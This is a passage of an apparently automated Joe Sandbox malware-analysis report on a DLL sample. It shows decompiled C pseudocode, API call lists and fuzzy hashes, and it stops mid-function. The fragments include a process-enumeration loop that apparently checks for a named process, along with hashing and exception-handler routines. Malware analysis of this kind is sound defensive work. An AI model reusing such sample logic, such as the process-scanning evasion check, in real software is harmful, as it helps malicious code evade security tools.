                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFreelstrlen
                                          • String ID:
                                          • API String ID: 3808004451-0
                                          • Opcode ID: 12ab82a63a90a543121fa6f1f76c21d6d36a3fc307d4a122f8c27aacb4491a5c
                                          • Instruction ID: e5ea4bd9949986f8232b64e0cee59dc61907dec13153bcaa285cb1b5fad080fb
                                          • Opcode Fuzzy Hash: 12ab82a63a90a543121fa6f1f76c21d6d36a3fc307d4a122f8c27aacb4491a5c
                                          • Instruction Fuzzy Hash: F7E0457200420EFFDF125F91DC46E9A3B6AFB04354F148115FA1815061D77295B0ABA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00C760CF(void* __edx, void* __edi, void* _a4) {
                                          				int _t7;
                                          				int _t13;
                                          
                                          				_t7 = E00C77A28(__edx, __edi, _a4,  &_a4); // executed
                                          				_t13 = _t7;
                                          				if(_t13 != 0) {
                                          					memcpy(__edi, _a4, _t13);
                                          					 *((char*)(__edi + _t13)) = 0;
                                          					E00C7147E(_a4);
                                          				}
                                          				return _t13;
                                          			}






                                          APIs
                                            • Part of subcall function 00C77A28: memcpy.NTDLL(00000000,00000090,?,?,?,00000008), ref: 00C77A5E
                                            • Part of subcall function 00C77A28: memset.NTDLL ref: 00C77AD3
                                            • Part of subcall function 00C77A28: memset.NTDLL ref: 00C77AE7
                                          • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,00C79F9F,?,?,00C79C62,00000002,?,?,?), ref: 00C760EB
                                            • Part of subcall function 00C7147E: HeapFree.KERNEL32(00000000,00000000,00C71D11,00000000,?,?,-00000008), ref: 00C7148A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: memcpymemset$FreeHeap
                                          • String ID:
                                          • API String ID: 3053036209-0
                                          • Opcode ID: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                          • Instruction ID: d8c2e6c2fcacaedb09ef4dd91e7712316b6931e6da3850268f7e755eda11cecd
                                          • Opcode Fuzzy Hash: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                          • Instruction Fuzzy Hash: 01E08C725001297BCB222A98DC01DEF7F5C8F527A1F048020FE0CAA216DA32CA10A7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 68%
                                          			E00C756A2() {
                                          				char _v264;
                                          				void* _v300;
                                          				int _t8;
                                          				intOrPtr _t9;
                                          				int _t15;
                                          				void* _t17;
                                          
                                          				_t15 = 0;
                                          				_t17 = CreateToolhelp32Snapshot(2, 0);
                                          				if(_t17 != 0) {
                                          					_t8 = Process32First(_t17,  &_v300);
                                          					while(_t8 != 0) {
                                          						_t9 =  *0xc7d2a4; // 0x24ba5a8
                                          						_t2 = _t9 + 0xc7ee38; // 0x73617661
                                          						_push( &_v264);
                                          						if( *0xc7d0fc() != 0) {
                                          							_t15 = 1;
                                          						} else {
                                          							_t8 = Process32Next(_t17,  &_v300);
                                          							continue;
                                          						}
                                          						L7:
                                          						CloseHandle(_t17);
                                          						goto L8;
                                          					}
                                          					goto L7;
                                          				}
                                          				L8:
                                          				return _t15;
                                          			}










                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C756B2
                                          • Process32First.KERNEL32(00000000,?), ref: 00C756C5
                                          • Process32Next.KERNEL32(00000000,?), ref: 00C756F1
                                          • CloseHandle.KERNEL32(00000000), ref: 00C75700
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: 31e2a9022a92c4dc618bcd6442be8284fdac1a66c51dc47e5e1f57399b0acf86
                                          • Instruction ID: 7475d02e911586eb14dabc9c63efc86eb62ee123da18155dd7be9c7d4cdeb860
                                          • Opcode Fuzzy Hash: 31e2a9022a92c4dc618bcd6442be8284fdac1a66c51dc47e5e1f57399b0acf86
                                          • Instruction Fuzzy Hash: CDF0BB726015659AD720A7369C49FEF76ACDFC5310F008051FD1ED3141E660DE8686A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E005F179C() {
                                          				void* _t1;
                                          				unsigned int _t3;
                                          				void* _t4;
                                          				long _t5;
                                          				void* _t6;
                                          				intOrPtr _t10;
                                          				void* _t14;
                                          
                                          				_t10 =  *0x5f4130;
                                          				_t1 = CreateEventA(0, 1, 0, 0);
                                          				 *0x5f413c = _t1;
                                          				if(_t1 == 0) {
                                          					return GetLastError();
                                          				}
                                          				_t3 = GetVersion();
                                          				if(_t3 != 5) {
                                          					L4:
                                          					if(_t14 <= 0) {
                                          						_t4 = 0x32;
                                          						return _t4;
                                          					} else {
                                          						goto L5;
                                          					}
                                          				} else {
                                          					if(_t3 >> 8 > 0) {
                                          						L5:
                                          						 *0x5f412c = _t3;
                                          						_t5 = GetCurrentProcessId();
                                          						 *0x5f4128 = _t5;
                                          						 *0x5f4130 = _t10;
                                          						_t6 = OpenProcess(0x10047a, 0, _t5);
                                          						 *0x5f4124 = _t6;
                                          						if(_t6 == 0) {
                                          							 *0x5f4124 =  *0x5f4124 | 0xffffffff;
                                          						}
                                          						return 0;
                                          					} else {
                                          						_t14 = _t3 - _t3;
                                          						goto L4;
                                          					}
                                          				}
                                          			}











                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,005F11E0), ref: 005F17AB
                                          • GetVersion.KERNEL32(?,005F11E0), ref: 005F17BA
                                          • GetCurrentProcessId.KERNEL32(?,005F11E0), ref: 005F17D6
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,005F11E0), ref: 005F17EF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentEventOpenVersion
                                          • String ID:
                                          • API String ID: 845504543-0
                                          • Opcode ID: 34210aa1248431c3606596f867e8c88305a85a40c91500a41c20b48156409b47
                                          • Instruction ID: a7c6047359a668df890ec8bbb7adfff14258e024900c058d99780a3890144ac6
                                          • Opcode Fuzzy Hash: 34210aa1248431c3606596f867e8c88305a85a40c91500a41c20b48156409b47
                                          • Instruction Fuzzy Hash: 38F08131980605EBE7106B79BC09B763F94B735752F100016E645C61E4E7788689EF18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 49%
                                          			E00C75920(void* __ecx, intOrPtr* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				intOrPtr _v36;
                                          				intOrPtr _v40;
                                          				intOrPtr _v44;
                                          				intOrPtr _v48;
                                          				intOrPtr _v52;
                                          				intOrPtr _v56;
                                          				intOrPtr _v60;
                                          				intOrPtr _v64;
                                          				intOrPtr _v68;
                                          				intOrPtr _v72;
                                          				void _v76;
                                          				intOrPtr* _t226;
                                          				signed int _t229;
                                          				signed int _t231;
                                          				signed int _t233;
                                          				signed int _t235;
                                          				signed int _t237;
                                          				signed int _t239;
                                          				signed int _t241;
                                          				signed int _t243;
                                          				signed int _t245;
                                          				signed int _t247;
                                          				signed int _t249;
                                          				signed int _t251;
                                          				signed int _t253;
                                          				signed int _t255;
                                          				signed int _t257;
                                          				signed int _t259;
                                          				signed int _t338;
                                          				signed char* _t348;
                                          				signed int _t349;
                                          				signed int _t351;
                                          				signed int _t353;
                                          				signed int _t355;
                                          				signed int _t357;
                                          				signed int _t359;
                                          				signed int _t361;
                                          				signed int _t363;
                                          				signed int _t365;
                                          				signed int _t367;
                                          				signed int _t376;
                                          				signed int _t378;
                                          				signed int _t380;
                                          				signed int _t382;
                                          				signed int _t384;
                                          				intOrPtr* _t400;
                                          				signed int* _t401;
                                          				signed int _t402;
                                          				signed int _t404;
                                          				signed int _t406;
                                          				signed int _t408;
                                          				signed int _t410;
                                          				signed int _t412;
                                          				signed int _t414;
                                          				signed int _t416;
                                          				signed int _t418;
                                          				signed int _t420;
                                          				signed int _t422;
                                          				signed int _t424;
                                          				signed int _t432;
                                          				signed int _t434;
                                          				signed int _t436;
                                          				signed int _t438;
                                          				signed int _t440;
                                          				signed int _t508;
                                          				signed int _t599;
                                          				signed int _t607;
                                          				signed int _t613;
                                          				signed int _t679;
                                          				void* _t682;
                                          				signed int _t683;
                                          				signed int _t685;
                                          				signed int _t690;
                                          				signed int _t692;
                                          				signed int _t697;
                                          				signed int _t699;
                                          				signed int _t718;
                                          				signed int _t720;
                                          				signed int _t722;
                                          				signed int _t724;
                                          				signed int _t726;
                                          				signed int _t728;
                                          				signed int _t734;
                                          				signed int _t740;
                                          				signed int _t742;
                                          				signed int _t744;
                                          				signed int _t746;
                                          				signed int _t748;
                                          
                                          				_t226 = _a4;
                                          				_t348 = __ecx + 2;
                                          				_t401 =  &_v76;
                                          				_t682 = 0x10;
                                          				do {
                                          					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                                          					_t401 =  &(_t401[1]);
                                          					_t348 =  &(_t348[4]);
                                          					_t682 = _t682 - 1;
                                          				} while (_t682 != 0);
                                          				_t6 = _t226 + 4; // 0x14eb3fc3
                                          				_t683 =  *_t6;
                                          				_t7 = _t226 + 8; // 0x8d08458b
                                          				_t402 =  *_t7;
                                          				_t8 = _t226 + 0xc; // 0x56c1184c
                                          				_t349 =  *_t8;
                                          				asm("rol eax, 0x7");
                                          				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                                          				asm("rol ecx, 0xc");
                                          				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                                          				asm("ror edx, 0xf");
                                          				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                                          				asm("ror esi, 0xa");
                                          				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                                          				_v8 = _t685;
                                          				_t690 = _v8;
                                          				asm("rol eax, 0x7");
                                          				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                                          				asm("rol ecx, 0xc");
                                          				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                                          				asm("ror edx, 0xf");
                                          				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                                          				asm("ror esi, 0xa");
                                          				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                                          				_v8 = _t692;
                                          				_t697 = _v8;
                                          				asm("rol eax, 0x7");
                                          				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                                          				asm("rol ecx, 0xc");
                                          				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                                          				asm("ror edx, 0xf");
                                          				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                                          				asm("ror esi, 0xa");
                                          				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                                          				_v8 = _t699;
                                          				asm("rol eax, 0x7");
                                          				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                          				asm("rol ecx, 0xc");
                                          				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                                          				_t508 =  !_t357;
                                          				asm("ror edx, 0xf");
                                          				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                                          				_v12 = _t410;
                                          				_v12 =  !_v12;
                                          				asm("ror esi, 0xa");
                                          				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                                          				asm("rol eax, 0x5");
                                          				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                                          				asm("rol ecx, 0x9");
                                          				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                                          				asm("rol edx, 0xe");
                                          				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                                          				asm("ror esi, 0xc");
                                          				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                                          				asm("rol eax, 0x5");
                                          				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                                          				asm("rol ecx, 0x9");
                                          				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                                          				asm("rol edx, 0xe");
                                          				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                                          				asm("ror esi, 0xc");
                                          				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                                          				asm("rol eax, 0x5");
                                          				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                                          				asm("rol ecx, 0x9");
                                          				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                                          				asm("rol edx, 0xe");
                                          				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                                          				asm("ror esi, 0xc");
                                          				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                                          				asm("rol eax, 0x5");
                                          				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                                          				asm("rol ecx, 0x9");
                                          				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                                          				asm("rol edx, 0xe");
                                          				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                                          				asm("ror esi, 0xc");
                                          				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                                          				asm("rol eax, 0x4");
                                          				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                                          				asm("rol ecx, 0xb");
                                          				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                                          				asm("rol edx, 0x10");
                                          				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                                          				_t599 = _t367 ^ _t420;
                                          				asm("ror esi, 0x9");
                                          				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                                          				asm("rol eax, 0x4");
                                          				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                                          				asm("rol edi, 0xb");
                                          				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                                          				asm("rol edx, 0x10");
                                          				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                                          				_t338 = _t607 ^ _t422;
                                          				asm("ror ecx, 0x9");
                                          				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                                          				asm("rol eax, 0x4");
                                          				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                                          				asm("rol esi, 0xb");
                                          				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                                          				asm("rol edi, 0x10");
                                          				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                                          				_t424 = _t734 ^ _t613;
                                          				asm("ror ecx, 0x9");
                                          				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                                          				asm("rol eax, 0x4");
                                          				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                                          				asm("rol edx, 0xb");
                                          				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                                          				asm("rol esi, 0x10");
                                          				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                                          				asm("ror ecx, 0x9");
                                          				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                                          				asm("rol eax, 0x6");
                                          				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                                          				asm("rol edx, 0xa");
                                          				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                                          				asm("rol esi, 0xf");
                                          				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                                          				asm("ror ecx, 0xb");
                                          				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                                          				asm("rol eax, 0x6");
                                          				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                                          				asm("rol edx, 0xa");
                                          				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                                          				asm("rol esi, 0xf");
                                          				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                                          				asm("ror ecx, 0xb");
                                          				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                                          				asm("rol eax, 0x6");
                                          				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                                          				asm("rol edx, 0xa");
                                          				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                                          				asm("rol esi, 0xf");
                                          				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                                          				asm("ror edi, 0xb");
                                          				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                                          				asm("rol eax, 0x6");
                                          				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                                          				asm("rol edx, 0xa");
                                          				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                                          				_t400 = _a4;
                                          				asm("rol esi, 0xf");
                                          				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                                          				 *_t400 =  *_t400 + _t259;
                                          				asm("ror eax, 0xb");
                                          				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                                          				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                                          				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                                          				return memset( &_v76, 0, 0x40);
                                          			}


                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID:
                                          • API String ID: 2221118986-0
                                          • Opcode ID: 4017203efa24db58f9d54351c93f765915507c990ab3cf859a8473f221a58c33
                                          • Instruction ID: 5dd9961dae4b77d4b8c203a3d9d1a490b6a3187d63d74abcd1f3dff8c93191d1
                                          • Opcode Fuzzy Hash: 4017203efa24db58f9d54351c93f765915507c990ab3cf859a8473f221a58c33
                                          • Instruction Fuzzy Hash: 7C22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00C7B2FD(long _a4) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				short* _v32;
                                          				void _v36;
                                          				void* _t57;
                                          				signed int _t58;
                                          				signed int _t61;
                                          				signed int _t62;
                                          				void* _t63;
                                          				signed int* _t68;
                                          				intOrPtr* _t69;
                                          				intOrPtr* _t71;
                                          				intOrPtr _t72;
                                          				intOrPtr _t75;
                                          				void* _t76;
                                          				signed int _t77;
                                          				void* _t78;
                                          				void _t80;
                                          				signed int _t81;
                                          				signed int _t84;
                                          				signed int _t86;
                                          				short* _t87;
                                          				void* _t89;
                                          				signed int* _t90;
                                          				long _t91;
                                          				signed int _t93;
                                          				signed int _t94;
                                          				signed int _t100;
                                          				signed int _t102;
                                          				void* _t104;
                                          				long _t108;
                                          				signed int _t110;
                                          
                                          				_t108 = _a4;
                                          				_t76 =  *(_t108 + 8);
                                          				if((_t76 & 0x00000003) != 0) {
                                          					L3:
                                          					return 0;
                                          				}
                                          				_a4 =  *[fs:0x4];
                                          				_v8 =  *[fs:0x8];
                                          				if(_t76 < _v8 || _t76 >= _a4) {
                                          					_t102 =  *(_t108 + 0xc);
                                          					__eflags = _t102 - 0xffffffff;
                                          					if(_t102 != 0xffffffff) {
                                          						_t91 = 0;
                                          						__eflags = 0;
                                          						_a4 = 0;
                                          						_t57 = _t76;
                                          						do {
                                          							_t80 =  *_t57;
                                          							__eflags = _t80 - 0xffffffff;
                                          							if(_t80 == 0xffffffff) {
                                          								goto L9;
                                          							}
                                          							__eflags = _t80 - _t91;
                                          							if(_t80 >= _t91) {
                                          								L20:
                                          								_t63 = 0;
                                          								L60:
                                          								return _t63;
                                          							}
                                          							L9:
                                          							__eflags =  *(_t57 + 4);
                                          							if( *(_t57 + 4) != 0) {
                                          								_t12 =  &_a4;
                                          								 *_t12 = _a4 + 1;
                                          								__eflags =  *_t12;
                                          							}
                                          							_t91 = _t91 + 1;
                                          							_t57 = _t57 + 0xc;
                                          							__eflags = _t91 - _t102;
                                          						} while (_t91 <= _t102);
                                          						__eflags = _a4;
                                          						if(_a4 == 0) {
                                          							L15:
                                          							_t81 =  *0xc7d2d8; // 0x0
                                          							_t110 = _t76 & 0xfffff000;
                                          							_t58 = 0;
                                          							__eflags = _t81;
                                          							if(_t81 <= 0) {
                                          								L18:
                                          								_t104 = _t102 | 0xffffffff;
                                          								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                          								__eflags = _t61;
                                          								if(_t61 < 0) {
                                          									_t62 = 0;
                                          									__eflags = 0;
                                          								} else {
                                          									_t62 = _a4;
                                          								}
                                          								__eflags = _t62;
                                          								if(_t62 == 0) {
                                          									L59:
                                          									_t63 = _t104;
                                          									goto L60;
                                          								} else {
                                          									__eflags = _v12 - 0x1000000;
                                          									if(_v12 != 0x1000000) {
                                          										goto L59;
                                          									}
                                          									__eflags = _v16 & 0x000000cc;
                                          									if((_v16 & 0x000000cc) == 0) {
                                          										L46:
                                          										_t63 = 1;
                                          										 *0xc7d320 = 1;
                                          										__eflags =  *0xc7d320;
                                          										if( *0xc7d320 != 0) {
                                          											goto L60;
                                          										}
                                          										_t84 =  *0xc7d2d8; // 0x0
                                          										__eflags = _t84;
                                          										_t93 = _t84;
                                          										if(_t84 <= 0) {
                                          											L51:
                                          											__eflags = _t93;
                                          											if(_t93 != 0) {
                                          												L58:
                                          												 *0xc7d320 = 0;
                                          												goto L5;
                                          											}
                                          											_t77 = 0xf;
                                          											__eflags = _t84 - _t77;
                                          											if(_t84 <= _t77) {
                                          												_t77 = _t84;
                                          											}
                                          											_t94 = 0;
                                          											__eflags = _t77;
                                          											if(_t77 < 0) {
                                          												L56:
                                          												__eflags = _t84 - 0x10;
                                          												if(_t84 < 0x10) {
                                          													_t86 = _t84 + 1;
                                          													__eflags = _t86;
                                          													 *0xc7d2d8 = _t86;
                                          												}
                                          												goto L58;
                                          											} else {
                                          												do {
                                          													_t68 = 0xc7d2e0 + _t94 * 4;
                                          													_t94 = _t94 + 1;
                                          													__eflags = _t94 - _t77;
                                          													 *_t68 = _t110;
                                          													_t110 =  *_t68;
                                          												} while (_t94 <= _t77);
                                          												goto L56;
                                          											}
                                          										}
                                          										_t69 = 0xc7d2dc + _t84 * 4;
                                          										while(1) {
                                          											__eflags =  *_t69 - _t110;
                                          											if( *_t69 == _t110) {
                                          												goto L51;
                                          											}
                                          											_t93 = _t93 - 1;
                                          											_t69 = _t69 - 4;
                                          											__eflags = _t93;
                                          											if(_t93 > 0) {
                                          												continue;
                                          											}
                                          											goto L51;
                                          										}
                                          										goto L51;
                                          									}
                                          									_t87 = _v32;
                                          									__eflags =  *_t87 - 0x5a4d;
                                          									if( *_t87 != 0x5a4d) {
                                          										goto L59;
                                          									}
                                          									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                          									__eflags =  *_t71 - 0x4550;
                                          									if( *_t71 != 0x4550) {
                                          										goto L59;
                                          									}
                                          									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                          									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                          										goto L59;
                                          									}
                                          									_t78 = _t76 - _t87;
                                          									__eflags =  *((short*)(_t71 + 6));
                                          									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                          									if( *((short*)(_t71 + 6)) <= 0) {
                                          										goto L59;
                                          									}
                                          									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                          									__eflags = _t78 - _t72;
                                          									if(_t78 < _t72) {
                                          										goto L46;
                                          									}
                                          									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                          									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                          										goto L46;
                                          									}
                                          									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                          									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                          										goto L20;
                                          									}
                                          									goto L46;
                                          								}
                                          							} else {
                                          								goto L16;
                                          							}
                                          							while(1) {
                                          								L16:
                                          								__eflags =  *((intOrPtr*)(0xc7d2e0 + _t58 * 4)) - _t110;
                                          								if( *((intOrPtr*)(0xc7d2e0 + _t58 * 4)) == _t110) {
                                          									break;
                                          								}
                                          								_t58 = _t58 + 1;
                                          								__eflags = _t58 - _t81;
                                          								if(_t58 < _t81) {
                                          									continue;
                                          								}
                                          								goto L18;
                                          							}
                                          							__eflags = _t58;
                                          							if(_t58 <= 0) {
                                          								goto L5;
                                          							}
                                          							 *0xc7d320 = 1;
                                          							__eflags =  *0xc7d320;
                                          							if( *0xc7d320 != 0) {
                                          								goto L5;
                                          							}
                                          							__eflags =  *((intOrPtr*)(0xc7d2e0 + _t58 * 4)) - _t110;
